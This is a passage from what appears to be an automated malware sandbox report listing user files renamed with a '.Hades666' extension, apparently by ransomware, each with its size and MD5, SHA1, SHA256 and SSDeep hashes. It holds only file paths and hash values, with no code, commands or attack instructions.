SSDeep: 24:FH+BAo5xbTCIvqDaO+Xnv0ZVuqIGh0za2HZJu:qAix3CIOaOgcZVuqIT97u
False
C:\Documents and Settings\FD1HVy\SendTo\Desktop (create shortcut).DeskLink.Hades666 784 bytes MD5: ee5022e20a22244be26e389a429b86d8
SHA1: b0126d9fe0c954c04d2ba1c7f7c606bb21d18c20
SHA256: 58b7fadf7b84a0f5ce08a3abdd668d3af1728f04ee08787c7bcf4197cca52118
SSDeep: 12:mJBhNIf3wHeGQJYcVLqLQEAXndfdJs8n0FZh8jgVuqIGh8lzaxy6Pq95Ziuu:mnhNi3w+rVO+Xnv0ZVuqIGh0za2HZJu
False
C:\Users\FD1HVy\Desktop\ids.txt 1.75 KB MD5: 7a710df2f42f4d5b581067e7dfb2b1e5
SHA1: 696b5d90d1c9ed036029226a5e4330e44f5353ee
SHA256: d3477be192edfe28e934887f3addccb30b493db1d4371598633030b94829ff8d
SSDeep: 48:wwCY1qRf5GJWAHPSM9RUloyAnAvxN6Q26I6c:wecf5HAqM9RmoyWON6P6I6c
False
C:\Users\FD1HVy\Desktop\ids.txt 1.84 KB MD5: d1520e5eb2fd504d773cc143ee0a683d
SHA1: a26ba463a8c680972e50865dd7f055705b23a423
SHA256: 50de301286c40b706ee02eab0bd6c33076b6d7e9c78f3e6f29f38b46597521c9
SSDeep: 48:wwCY1qRf5GJWAHPSM9RUloyAnAvxN6Q26I6A:wecf5HAqM9RmoyWON6P6I6A
False
C:\Documents and Settings\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.Hades666 1.59 KB MD5: 1a1e22e4aded62277aee38cf4a04f9b6
SHA1: d49299265c3cc9052e7ffe4044b5242c1868701d
SHA256: 3c0de3b469dc687f72cd1f42e3b13ef66ca6eb5c7797629563b61e8a54d9a770
SSDeep: 48:zER9JV9YLCR2xJWjY2R4BDfU36OgcZVuqIT97u:zER9JV9YLCR2x6RgDfUKOZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms.Hades666 5.80 KB MD5: c71149412cb73836dd6a19825cccf66a
SHA1: 54e237fc47b2e21d6b7fbc7681429d7054aec8fc
SHA256: d39f8b552078e5299496559c29810a7254672eee81f47f334d72940f80aa31ed
SSDeep: 96:2BfGL41zebQ7QU/j5yDxepOqbRa9bpwhyTDtgBjeqe53HXTtOZ6Y:2BOL4o8/NyN6dbRVwnqBHG3Hjmt
False
C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms.Hades666 6.08 KB MD5: 7350901e8fb836997ee7f54aaa45933d
SHA1: 0d9b3cd980e0da8fc1a66106bf23defceeb8b65f
SHA256: e5244564bf15392974a1c7fda3902f5cb3ca87f4277ffe7acf4b838a86791ced
SSDeep: 96:y92MVP2yEy6xjb4gke38b2P/SVRYLMYeI3ggYvi8vBrOI/wvtHrUt7YhVWvdowOj:yQ+ZEyY3JP/KYgvdvi8cKwZrUOt
False
C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms.Hades666 20.50 KB MD5: c5144a3d7ae9f975d7baedd7c115414d
SHA1: 106e54f7f727f2ee1c2f1021203707c7c41afdc9
SHA256: d57cbc9642600e15ce7a1ff7fcef7d88e01e7717a0ff3866edc2817e539a4e46
SSDeep: 384:DU4jHTWCIM7W7xyno/9TElfUNcfHhR2LvUcgUtl94VF:DdHTWCIMaMoVI6cfBR2L8xUt4F
False
C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms.Hades666 800 bytes MD5: 35c9e08d0403b0ce1f6a1818cd6aae0f
SHA1: 277b538b6f5b71a8df6bf913e87cc4420018593e
SHA256: 51e44cabe15e7938b617d00db15468d4c912bd327a42dcdf06a0fef86c1439ca
SSDeep: 24:XpsxYExT1lZ4qiO+Xnv0ZVuqIGh0za2HZJu:5MOhOgcZVuqIT97u
False
C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\9d1f905ce5044aee.customDestinations-ms.Hades666 2.33 KB MD5: cb3edf9dd6bf5fe1dafe38b983ad5e6b
SHA1: 657e2cce58faf5179a24011dd0c01cd353c18b93
SHA256: aaaa0c919b05a28795eed5952654562d5b1a10c7a0727af74e38dedc03ef61e5
SSDeep: 48:FrVq1z9jiIXDKkkpd0gl3S2c9FnHd1RSglOgcZVuqIT97u:FhqzBbDI0gB+FF5lOZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms.Hades666 800 bytes MD5: 8625ec93eba9905a903c7c8e610f2857
SHA1: 25aa3c780e8d4a97cf5072feb7e5d2e5d7fb468d
SHA256: 67628093b55ff8426701be1ba22eb780cc42c0f0d281808edbf94287c67ed192
SSDeep: 24:aa29ROnRfEtH7O+Xnv0ZVuqIGh0za2HZJu:72Mf8H7OgcZVuqIT97u
False
C:\Documents and Settings\FD1HVy\Recent\CustomDestinations\f18460fded109990.customDestinations-ms.Hades666 800 bytes MD5: 9fdac25b592915bc6c46545aa7024c43
SHA1: dde631e377e9cd3ce777b91e5eaa38ba62680961
SHA256: c2c92ddcb28e126107b0dbf1579b62c77055abdc006f6474274f3b286e26e927
SSDeep: 24:2h/fgAGl9inw1VHYO+Xnv0ZVuqIGh0za2HZJu:2wta6HYOgcZVuqIT97u
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\162797d679096999.automaticDestinations-ms.Hades666 3.25 KB MD5: 3efc948696ff70c194eb6fc1a4cf6290
SHA1: 185c6786368cd268c90cb62f9d97a02195926414
SHA256: fbc6faf774dfc886f0a9a234c46446f1fca172b1de0a3087c8c2bf4d8410ea57
SSDeep: 48:HKBFFLV2B0blH1CR4ZTdLpWCjs+NhengRE/lyxXaWoAPaNrFmNoagTvKnkcU7SIK:Hul1lgR4VWCg+NdXaWoAagxg2kVxOZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\1b6ebacd7cd2f25a.automaticDestinations-ms.Hades666 3.25 KB MD5: 58c3ee779f2a6ace56551d1573aaa019
SHA1: d69a49ab66dc08f78923686ee5a51144467f7880
SHA256: bef0da946205befcbfe06ca2a147b1152fa50b1178036f4294e1880b41e624a5
SSDeep: 96:ukCUHNIJUWuCjIDzWGcHJL2O1qpxZ4ncOZ6Y:3CUqC6IDyH2qCOft
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\5175b273ceba776b.automaticDestinations-ms.Hades666 3.25 KB MD5: 89ba0b45083cab3a8b31affa29386fd4
SHA1: e231195ecd3a89722a70a3e093586d34cc16cd71
SHA256: 809436feb37df17c57137ead9a7cb85bf8021f0c6d65c0527f6588d91e8869da
SSDeep: 48:yRiaj9/iOlWJd4H1AzegFhn5Go67+kBJ9u5LhtnzO9GoXGp2OgcZVuqIT97u:v4/LlWJ2VWBh51kBmLh9O9GEpOZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms.Hades666 70.75 KB MD5: 70ce55300085bf5b85c24ea7b828cc7e
SHA1: ac815926a5bcbf61be0c9c356cf0e1e1a9bcd324
SHA256: 0ee48da613f4178ea344b2ab85d6b96b2a2185a02615e7053c0d6c63f7cfa765
SSDeep: 1536:gJFF+kl+V9OVFfndznQ18giGlWU7/kH2LHl4etgQ3MIExQZDjN:TklgidznQy4WUbkH+CYG2
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\75668a91ce73b054.automaticDestinations-ms.Hades666 3.25 KB MD5: becd0c7d559ce9f89b6ef256a0635af0
SHA1: 976f354b229b2ec41b7ca69632a2f09837e5590e
SHA256: c5ea21affa65d2293e164ec3661162239535342e5a4d36d276b333432e977831
SSDeep: 48:7M5O1vkYwrO/KEEu4V2NK6GL+3wFu2x2dJsJC7qHjU2Y+3kIxidOgcZVuqIT97u:78Rr0KlV6wDC7P2PL+OZ6Y
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\78f0afb5bd4bb278.automaticDestinations-ms.Hades666 3.25 KB MD5: 271fb48eccc2de1cf41315d6a453a4d0
SHA1: 875da02ee4d9272ba352df144a21ecaa2929be77
SHA256: ea3ec414dfac6c253d00284fde7eec6474cd78d319fd675e72730351a4b8a1da
SSDeep: 96:ljaSP3jAdj3Bk+nZjrRWQDwvl02+tROZ6Y:pxMdjRTnZj1WQ2m2Dt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9c08ad74ad8708df.automaticDestinations-ms.Hades666 3.25 KB MD5: f55b1f26966ec6a97f05ffbc3f93b4ef
SHA1: efe860aaf17bc27337c8dfe41ea12d38f93efb29
SHA256: 1130ae45d1b6d8dc40e9751962e7996707384d465ff7d8d983a2225e709808bd
SSDeep: 96:8kCKUfcMYks8R8gJCnY5dBN+WIkKtBzDm5ipTOZ6Y:NC3fcM6K8gJPdj0PzaMpMt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\9d1f905ce5044aee.automaticDestinations-ms.Hades666 3.75 KB MD5: de280a7c166ddc70cfd4e0481e4c887a
SHA1: 1a06e4f046f0003949121a6d6d93a7918f5a448b
SHA256: 3feb63168fc4e1fea14d609ea1e639bf3f2f0b80f19cd637b0d7d4fdb47a605b
SSDeep: 96:ji8c7Ho+xXgcOdNR2CDCUcT5GUXclOZ6Y:CbLVS2mwTItet
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\b8b3a97bfbf120b6.automaticDestinations-ms.Hades666 3.25 KB MD5: a61ad74dec50052f72b8177f9c9ce78b
SHA1: 13d7d5a489a76dd8ba22c7e1b0e8fc977bdd7d2a
SHA256: 6a755460abc69a9f259a5fcf0325c1d79227149015b056810ad6f73235a503cf
SSDeep: 96:Al6VgLvFV6jROlUEA1bYej1z8tPi5oQOdeOZ6Y:Al6VOvb6WUl1k+z2ayt
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.Hades666 34.75 KB MD5: d5758e83bf061ebca6a90fe05518cf17
SHA1: 6a7973cf6456adaa3780deb5add1bb669d71f78b
SHA256: e9fbf05c8e92a7aeeb5c945f05510b866815741c7822bbf44dc548167e9fbcae
SSDeep: 768:YfORqVjRZX9aTd0wLzLnsNSn53PUAeyhfZ+xmPlFh8FHi:3i+0wY8aAeI99FyFC
False
C:\Documents and Settings\FD1HVy\Recent\AutomaticDestinations\fb3b0dbfee58fac8.automaticDestinations-ms.Hades666 3.25 KB MD5: 6c7c80c0b0bd1edeaf73442c56d9f9d7
SHA1: 6f4deabf501d8db3c26f925ec9eb39435687d775
SHA256: 78ffaaee8a223494b102ac3313d532b36840ad2369bcd939250b5aa53a03c29c
SSDeep: 48:ULqpjaxd8A1N/wM9F/unH/xVMwTMpciQpBIWcJkILVufh1PoOgcZVuqIT97u:ULXxH5P9F/upVMqMpc9LIxJLoJBoOZ6Y
False
C:\Documents and Settings\FD1HVy\Pictures\0dkB4I3aeR0WhEp.jpg.Hades666 93.19 KB MD5: c565c5f0363a0e20dc51ac48c660a0e3
SHA1: e7df97bf2dfa9e2a13db5a8439ba51ffa737034b
SHA256: 55daa2e9829fe7ef7932e848f7b2c276407aa6766d4b0c11e11dbd9d0f848f5a
SSDeep: 1536:l6cd3o6SzJQR3wr7j0irrlIL8WVCEarVYUjfM+sXZCVH4i1yRLBpy/iYlZ0y/15x:l46SWR39iXMSVYkkpsH4aiBppI5
False
C:\Documents and Settings\FD1HVy\Pictures\0NqnB5j6.jpg.Hades666 83.38 KB MD5: 6eb4a6467c3158eb2a12e9f038e13ae0
SHA1: 7455cfcf17a3eac4073af476333bc580b6954061
SHA256: ea1e52689078c969ffa64c3c4a16f52d0e754a19e5f755a40c38cfa288f1516a
SSDeep: 1536:gBNU49ZkR5TdtqmGx7AnU0qsvxmJAXoBieFVh3Tbgah:grU49ZGKIqsv8AYBjVtTUah
False
C:\Documents and Settings\FD1HVy\Pictures\3jFFHm8Ce9nlSPpERMKA.jpg.Hades666 96.97 KB MD5: becd53e81cadfa291615feb87a21770c
SHA1: b0938d145618b0421de297963357244d0a0bffea
SHA256: cfc2af6a25475f8849bff9684cc614d7d3cc30492e7bcacea004c09c24a9bc65
SSDeep: 3072:cB0UI4OdlEk306V5Uocy7AymNhW+PoCQK6MM:1BOkkjon7GH7T2
False
C:\Documents and Settings\FD1HVy\Pictures\4xy1qpl4hklhR.gif.Hades666 14.50 KB MD5: 96119fe583f0f6c8b11b2f1c289aea96
SHA1: c84dd74dddbb93e4fc4eb560826298d4fef676b2
SHA256: ffb8d712ba8cd3fc20f282a66b017570ac22dc7a22dfd7551b99f490b196124c
SSDeep: 192:eZbq+VDN1yUgxHFZQmtrQQRTT4wITxBI4WertzGD+vBumNsgHNvi7M9KtWJZt:eZbVVZ1yjdFZrT0wo7lvJBumrH9IWx
False
C:\Documents and Settings\FD1HVy\Pictures\6b0 5cwb.gif.Hades666 84.36 KB MD5: 3bdbe8eacd9068d5aef8af3e53f912d2
SHA1: db48b15e7728aecee77568359695f51a35946824
SHA256: fa04d4f3c52e06d297dec425f0918c39ff183f69adc2686fab614b267b47553c
SSDeep: 1536:opD+ZOFGkUkvKzt8cxdByvEGKMo4MWXPdFQ15hbkIdz8FtxgITRgW9:opD+ZOFnlKzt8cty8eo0XFFQVke0nltR
False
C:\Documents and Settings\FD1HVy\Pictures\74BtE9_7W-bUHV-i.bmp.Hades666 30.67 KB MD5: 7f8be8fa5f89345865fa6882fb208fda
SHA1: c0e84b885682119935086ecebaa45506be228e04
SHA256: b1d9d78b7adfb80c7495507a2b2c92429566599f0a35dca26c6137b5d77c4b0c
SSDeep: 768:6SwdboQgKM2NPxv3N2pZW/XASLbvkvrGHFuS2D:6SqpJ1xv3N2u/XJbvCrGHF/2
False
C:\Documents and Settings\FD1HVy\Pictures\8gQHWG8D1b-WZD8.jpg.Hades666 34.98 KB MD5: 3a80e77fedbba41d4fe486c3538df8f4
SHA1: b7f912ba60c68bc66cc09dc607d8049a0293aaf2
SHA256: 550ab3cc5972cc663f90a06851e54cc3ccf4218a9f36a03c82326bff44e273be
SSDeep: 768:0s3jguGn7appLFrW+a+9FfuwqQJnUjEcoTNyhtROEaCJ/ZhCj:L3jlkajUDOfZcZtRqYCj
False
C:\Documents and Settings\FD1HVy\Pictures\8SeBXCtLhthpcg.jpg.Hades666 71.34 KB MD5: 2dc55f4e6290b7105387f7e00d9ffda6
SHA1: c8029090dc57b14dfab74562d5325c184ca5808a
SHA256: aaec7d299f0410106697c314f1578c935a8ea36c2cf00af5659d92dc46ebe0ce
SSDeep: 1536:rnWu/75M+ZsScpDJi2HGZMjo+oLLbBEw0O54SkrWBjTb:rWuD5a7DxFo+O3qO4u/
False
C:\Documents and Settings\FD1HVy\Pictures\9DYO94n5aNmm9ydACWU.jpg.Hades666 92.84 KB MD5: 933ea04f6f43a26b014808d46d7b61f9
SHA1: a31802100424d7ef4a7dc5a56f4c03a4904fe059
SHA256: 6a67ac457f6080facace53fa37ca2dbeadf8e1a9d0127ebdac57f48da82730a9
SSDeep: 1536:qWw7fCQK3iSoXgfSN9uwSDurxVsR4qHMwEkIeCHuh3Mz1vGkstzzxFP0Yk:qWw3KSSfS7kDXvs3kIeP3u1uXVzPE
False
C:\Documents and Settings\FD1HVy\Pictures\a3E6ONcMIha.jpg.Hades666 86.33 KB MD5: 82b61632addd0ef83c6bcff96f9dea4a
SHA1: db88024a096837dd05df4b07ed95912628eba57f
SHA256: bcce2c8dc87c9128403b8d92d761a744ecd5d5229555d91584c68906f6f800b7
SSDeep: 1536:vHpU36LD4A2RO4t+up6Dh90cKJ0VN0wviQUV5AWrMV2YZW+:BaY4jRO4wugaw0UUV5Ab1j
False
C:\Documents and Settings\FD1HVy\Pictures\apZJaH9FN.bmp.Hades666 40.23 KB MD5: 35044f430bc62377a9743267b474f20a
SHA1: 3eaf48d5d5d991a5eeaf28308f2ce7c49cf70ca6
SHA256: 8409349dfdaa3cb055b48172aabb069320abbc22ea64ed46c76773570563a3cd
SSDeep: 768:P85hkPvydRMgeV6d1ynfySxBlVYZKGQONt6StA18lEJAx/BSiJlyN1:P85huvydagG6d1ynfykBlVIX6Ay8lMOy
False
C:\Documents and Settings\FD1HVy\Pictures\b64pLn92L.png.Hades666 72.09 KB MD5: 85872958d02d7d5b5df3754da2594646
SHA1: 605a7da799e8c15f7d3f7cd0aa36b6a74252e587
SHA256: 91bbf10c9b6d899dcfef18f6224786186596c1f385ac16ccd0994f8e069f18ea
SSDeep: 1536:xsheewla4i2+qaLHC20fMGNhBYY3WAf+A:+SNn6C20fhNhBvWAfj
False
C:\Documents and Settings\FD1HVy\Pictures\epArqwSa7RO.png.Hades666 39.31 KB MD5: 94d78b31165979450719f2ffb6ba3ebf
SHA1: a5d6955ca68e84152e0acc09302e0b1a33185433
SHA256: 9007ed9cc0b6faec8f13eb1c7f3934e78bb990e716fbdcfa2a76b06c53903fde
SSDeep: 768:rbP78Fzig5Bg89tWI1+hLKPdslKbxdeqfXkQnjbijd1hqedOou9x62JvQ:vPAz7B79tWI1+hLkelKbxvXkQjOhDqe7
False
C:\Documents and Settings\FD1HVy\Pictures\FLboYyMvap3QSfr_G.gif.Hades666 14.39 KB MD5: 67347446a8449c046971767e1a680cf0
SHA1: 81c1beb381e7839bef07d60434d69167f4d9fc3d
SHA256: f66f3c3c1aaecd05529d7d42bf0923ae61913cf47af4e0effe6de226e6c842d4
SSDeep: 384:YsOMeSWvxCNw/FjdIQqxZ2KkpFsH2Rd24i:d6BINAv6WaWfs
False
C:\Documents and Settings\FD1HVy\Pictures\hWRjDv4Dj80gAU.jpg.Hades666 31.78 KB MD5: 31ff0211020362ff994abfd1d866b5d8
SHA1: 49a5a9761ef658df3a357a65173adc7b4a5b9b0b
SHA256: dfb6d77edbe0e06d5f295af1a5fd84ed989b00fb3ee6ed46c3acbe7ea47b36c8
SSDeep: 768:85lBeb45nfyNA+suLMPXElWH2pmhyRd/R58dI0K:UBVLuLMPXwmhyH0I0K
False
C:\Documents and Settings\FD1HVy\Pictures\j7GygMimmKlF.bmp.Hades666 36.89 KB MD5: f8b6711a381c49bd3ff2a890710dad54
SHA1: 496850dd23c4a27346e8248ae7c41f71739049ec
SHA256: 5525a3f63dbc6524b9e6770283214c930f022c4b59a1401b0579b57d29778c16
SSDeep: 768:lYNyDzj8SgwxH3X9PWXOGK5hFVIWh2Ai+3Cl4BRIagC1+xacR:lYNy3VgwFX9P4j2jVZ8GCKBRIagfvR
False
C:\Documents and Settings\FD1HVy\Pictures\jEdokHr2EgPgrGWyVHAH.bmp.Hades666 24.56 KB MD5: 6744be3fe3f4cc63f8fed7aa89a606ca
SHA1: fde1a73a1651e38ad90a658b1489663de39f6bfb
SHA256: 2c16f792fd4a535c0d8b49c856b0739557b2fb64c0034ef955d52897e9586845
SSDeep: 384:XKKOx3dPJCvELT7s2FjDSQFwAIZMLYXKtLzqLph4gKYKnVRM3KafqlsIe6xNpKbk:VgPJFLTuGwJZMLYXGYpWjVs6xNpKbk
False
C:\Documents and Settings\FD1HVy\Pictures\jrwTmARnBghnUWTW.jpg.Hades666 80.81 KB MD5: 26694e25d9ad6b6399bd1edc7bf45363
SHA1: 2a2bfe69dd34e3e73883e69c15eb2f9a9499d178
SHA256: d6cf957c6d6038facf1dee94e3b699c7d4b4d74af5b99259975cd92c015a0b05
SSDeep: 1536:Papgd5e1BUWKE9OGqFMymDY6VJd3oI428Qnab3QB1Op+0y+rkomhHxU98sR:PnekJU5qKe6fph428QaMTOpJPw7S8C
False
C:\Documents and Settings\FD1HVy\Pictures\ks9tykG.gif.Hades666 90.47 KB MD5: c4e3ff3901b4c7a8cc79b94da93cb3d1
SHA1: 397b8333064ffa425a44e24a3923479d3415e02c
SHA256: af1105803b1ae00aefba8b900f7837800babb8027a044e2e8c65779c31eddcf6
SSDeep: 1536:CBNvL7l8aY2H5yB+KWNsnDkO7dlNfcIhPv7fKyHCtQVvh1lLeIY/8nXuPJNoy7yb:CnfF0IKWYdlVcc37yyHCtepLL8vn7WCs
False
C:\Documents and Settings\FD1HVy\Pictures\M FAL8HMMU.jpg.Hades666 71.69 KB MD5: 94a614df03f680b60e1d81cd9d2f1bfb
SHA1: 173507b539ebf2e0a4620fe136f59dead1b5f273
SHA256: a3755eea6eb3fa94a4599ea8d9e8f48f11fd6720e57b1d8a8537fa6909801584
SSDeep: 1536:j2lao6dR9S523PYlS3tc5vOQoHyTbpnPHKxEuIYrukHMUM98:afu9SU3Pz60Qoqx2pIYZHMUy8
False
C:\Documents and Settings\FD1HVy\Pictures\nKAALB7g8JVy3bNicZAV.png.Hades666 69.98 KB MD5: dc017409b155065eb8d48a37d9f755b1
SHA1: 639ca9464659c95a769359602b758f75ea344f56
SHA256: 78de13323a12804d542c06f720a71ddcf760d9ac217cd4e849c7c402bf0a8f5b
SSDeep: 1536:0vB7cF9I/z27+5UUIB5eAqLe3T9cO2n/NYLi3gTH63:0Z7M9IreoUUIB5eAqLSTuO2siea3
False
C:\Documents and Settings\FD1HVy\Pictures\ns2m9GT_sYgG6NU.jpg.Hades666 54.44 KB MD5: 085d5f9cbc75e6653cfbc6ccf2564a5f
SHA1: bd09f59787903d97cccd0323b3c9c589da60d2b8
SHA256: 08f30a1e5c41a00947f60c51b43c5ccff83c0eb2c8138671aab1b7da622998b1
SSDeep: 1536:oBzcujjDdTkdl++OlzkfVyk/Uw/AOc4noKB+:oBzGl++izFk/UKcK4
False
C:\Documents and Settings\FD1HVy\Pictures\qQZElOqALjjZs185FSJ.bmp.Hades666 93.66 KB MD5: 6a84411ae14e26a4c4653589724fd2f1
SHA1: 92be31fe7d7a437f545d246ffd36eb847eeecd9b
SHA256: 98f1a6ac5a4db229c01204906a496c5d0245ec6548933635a9de25e72ffcf17e
SSDeep: 1536:4QVd0sGbGQUa86GAQFRhZtYJmSvqZBh5jpWAVEfE7Z0BCj6MENj7zhmIFl6PhG66:fVd0sGdUeGA6refCZL5NWAVGE1B6VNjn
False
C:\Documents and Settings\FD1HVy\Pictures\QrmX5zar4TeL3G.png.Hades666 33.84 KB MD5: efa679c55f534cff84387c8d764bbd57
SHA1: 1206e6cbd61dcdaae3a261f65370cbae3c5871d2
SHA256: 5c911045fef816c9223cca024ee11c3f905d7288a89651f3ad27a6a0c3f2cd6e
SSDeep: 768:hcddgDMwlJkzy9X3oGNd+9XwaLPGjQS3Ib89oYlElA7JxZuNrBsj:addkXEzcIWs9gcz89rCsJylsj
False
C:\Documents and Settings\FD1HVy\Pictures\T4b_BS -CrryhZvHxt.bmp.Hades666 21.83 KB MD5: 5dff127a8cbaa3d61cfc30228dbcc74c
SHA1: 5f54de94fc8d11e3ba650971675f34f59ec67029
SHA256: 487e8cc734210c7859cad0753f0d206dcfcf82045f6405ad331d13bb0007dbd9
SSDeep: 384:HNYi/HshoHaQD/5vBKohn2I75D0WAc9QYfNbLmrVHVYfAPl31ORhb:H5Hsq6e6ohn2IND0KUJHVY4PpsRd
False
C:\Documents and Settings\FD1HVy\Pictures\v4ZDHE a-uoAR3Cw_zY0.jpg.Hades666 94.27 KB MD5: 8173df6bce444a9275b31050adb083da
SHA1: 118bb439bae6ff7ef76eb9de93816241359c2d26
SHA256: b2343318a4498ed8edb539b755c0f264cfa04cd7b7dcd2c85e086f28abc65e98
SSDeep: 1536:fiFaW2kvbfrNjR12CqrGTR34WmnJtzbKRJGwv2BLZFF50nC0ZIjfyRpjz6LhW/:aFR2kvbfrjARWZMFb0J9OlZFFICmIrK/
False
C:\Documents and Settings\FD1HVy\Pictures\Zo_fD_dUydT2ng.gif.Hades666 75.23 KB MD5: 8ee50c119ac54fe6f688ab7036a09706
SHA1: 85fc4d9b42a94fdfb4c3e84baff38f4eb39b3de8
SHA256: 163fb40a0f226a16c5814e05faf1e8ce3496e4e0844242fe48fb8b3d0fbd549f
SSDeep: 1536:v7ieV5v9AZGxETgnUX8ey0pfJ3q7XzzXsEuVmbwZaEPW+HlYGi1Fc:v7iLZFTaebhUvbO19O1Fc
False
C:\Documents and Settings\FD1HVy\Pictures\_tGw8TZHXe.jpg.Hades666 74.44 KB MD5: cb2a1dd7fe67df6d1b04dc2b2568fe67
SHA1: a797df764865743b6e9319e01b177fdf1728ecc6
SHA256: 31afadbab71b382b8bcce67e1a63730de1b3ca4c310a2e9dac3d99827d073aff
SSDeep: 1536:JTuppCHCuP2KH5r1HEhSWEJ+FgJuYmVfqjW:JTupYeMZEhQRDa
False
C:\Documents and Settings\FD1HVy\My Documents\-HEK-DXQ3wmbagAJfJY.pptx.Hades666 48.77 KB MD5: 519b435a0b4627f959226867097ec92a
SHA1: 0125e9ee0765cea22dba1b98d86bdc05f9ab887c
SHA256: 2b269aa8e3577111cf9849b8301e500df4d0b9bde60af47c137f8fb1c45cffcb
SSDeep: 1536:24iux4AyDSe343LPBSK1aHDLVod+JGte+FK:24iYxKV+SauSzte+s
False
C:\Documents and Settings\FD1HVy\My Documents\BZ4TrAu8yl96JSfZ.pptx.Hades666 12.48 KB MD5: f829f86bcc7e9993c2df2a017f0b7c07
SHA1: 4e7df3a20fb6a6d3ac5740a1ba880ce3aa597e96
SHA256: a416dde7754df63b76165c46779332b7d8a8c7fcf0696d5ee169e1a5f0318498
SSDeep: 384:L+VL2SBovuqGyrz7mkfOHvDx8yS6Rb/pTTm6V4xD:Li2SBMXfDWLxnAFxD
False
C:\Documents and Settings\FD1HVy\My Documents\cHQW.ods.Hades666 22.03 KB MD5: 261b6c0db3f83f80cbc19e9c50618a59
SHA1: 327131ddaa9290d2025b37bc5862c9adeaab1227
SHA256: e6bcf183b3bdd1581e2dfa67709fc69bb4480035b17a076681e3d28bd45dd174
SSDeep: 384:3KaPgvV4S+FZh9v2NMDtYZ/WaW8KOSHO8WzIJP6Oxzddav4N6JDiPauFz59x2tF+:3KaPyiIMpq+aWVOSHtWcF6izd0kX9x2O
False
C:\Documents and Settings\FD1HVy\My Documents\cxezl6TYX11ixWRNjCV.docx.Hades666 48.34 KB MD5: 4fdbd04cb180461c6b97a8ba48069eb3
SHA1: f4610d646a6e7fbc642f3145f43ea4fe09556133
SHA256: 78a22524f71923e0fde520b8602672d64ec4214d971d2dcd886812a62c219f0f
SSDeep: 768:+4ovOhriAAxD+JU00vLFksDWzmgg/HAJdMin24qrXsK9znSj47xHn7w+F:+xvuiAAIVCFq/CgbXG595pn7w+F
False
C:\Documents and Settings\FD1HVy\My Documents\Database1.accdb.Hades666 340.75 KB MD5: cfb0eac3846aa89ec068d60321b2cbc9
SHA1: eb165d0c185a9623afa5a494ebb43e4a73616919
SHA256: 251f75926c0640990a06e3deeb374ae0437f264d374922af15a1c507367dcd99
SSDeep: 6144:vdVZsrSVfOS79Lc3D1FxvqdfieoLt9Cg9SjiOwCUjLLh2DnFbkUgWaNDZF2RyJ7J:vdVGrSVfGT1FxUqeop9L23ULUDFbwpDJ
False
C:\Documents and Settings\FD1HVy\My Documents\dj05M a9Ph9ACFyExLrh.docx.Hades666 64.69 KB MD5: fac3415860f3c0a831f2d9c1bc899779
SHA1: d5e44ea04cd28d383765c7f3e39b3328d3df6fe8
SHA256: e839b750ed5afc0fe75d07311fb60fc226048bb551940b335527af49fd22f250
SSDeep: 1536:2vcP9xaTfPvQrU1K2Equ9ZeLAsVY6TBy/nIC1V3pssw:4cP9WYrU1KjqFLpVNy/nICLmd
False
C:\Documents and Settings\FD1HVy\My Documents\F4NHuiDmUc26bw37Go.xlsx.Hades666 75.72 KB MD5: 467e268bf0f0cfa09d7a6c9f01a15929
SHA1: a2326ba0bbffdd27f92c962f8a4accf55c87ff16
SHA256: e73b9264a232273d6bfb6315a5115cf3b90f0f01dac219f0e4289a80c403fd6c
SSDeep: 1536:EpWv+r4rjNZCM66f0+qb5Scw2PqdGburCbCUWZoA991o3G9QoHkl646V:l1rr2Iqscw2idFrCbC3oC91o3G9ri64g
False
C:\Documents and Settings\FD1HVy\My Documents\FhduDA Hp_S.pptx.Hades666 68.48 KB MD5: ac058faa41ab1f9608fe401881a6fe1b
SHA1: 8251c7757893935f1193e57aba1c4d013b2e0d8d
SHA256: e9bea61865bfd827e7efb9a17747985ec1f33e7b6de92b7f7bf1d7807b893dbb
SSDeep: 1536:Ht5yH0z5EQkxHEj6+7hNhZ155ivUXJXzD02TM9AH:N5BzPktoNhV15AvA502TZ
False
C:\Documents and Settings\FD1HVy\My Documents\FMoEmzd4.docx.Hades666 93.23 KB MD5: 9976dad4ddae44da528c79e4efbfacb1
SHA1: dc86f09087e5426f4c49578e4ef84f029b0c755c
SHA256: f2c736b0d76d9e9a20c48f60c9ebc7c64516b42cc056780283f4bb0190b7a576
SSDeep: 1536:cIJKKqJBsDqbDznuRg5La5lmwTSR6qVI196QCIYlEQeYDhofdpxf7y+obYnZl8QB:cIeYYDzuRmglhOxVK6eY2V0hofdTy+Zn
False
C:\Documents and Settings\FD1HVy\My Documents\hGEAu7lMb4Z5lAjdw.pptx.Hades666 20.72 KB MD5: 584708a84ed1636b5efd691ba38cea09
SHA1: 261314c15c35bbc43a79efff37f75c63d7a3ac84
SHA256: 69721cf48d73c3ad4eb8222ff70d3a49ecbbcf31f10195bddddd49935b4b6651
SSDeep: 384:EJUGGEHK2gwfSgWwpMSYXAsxuNrvF36S7siPcsL8zbcWTsRFsLMCirSno:EJUGLq2gw3OAsAxdJFozAWT0p
False
C:\Documents and Settings\FD1HVy\My Documents\Hy99X-RH7W-oRpNxJm.pptx.Hades666 28.47 KB MD5: 18ae349f2191a692039971553aa37b3f
SHA1: 6de170cb0301ae1fe7887553d1a8a455ff797a16
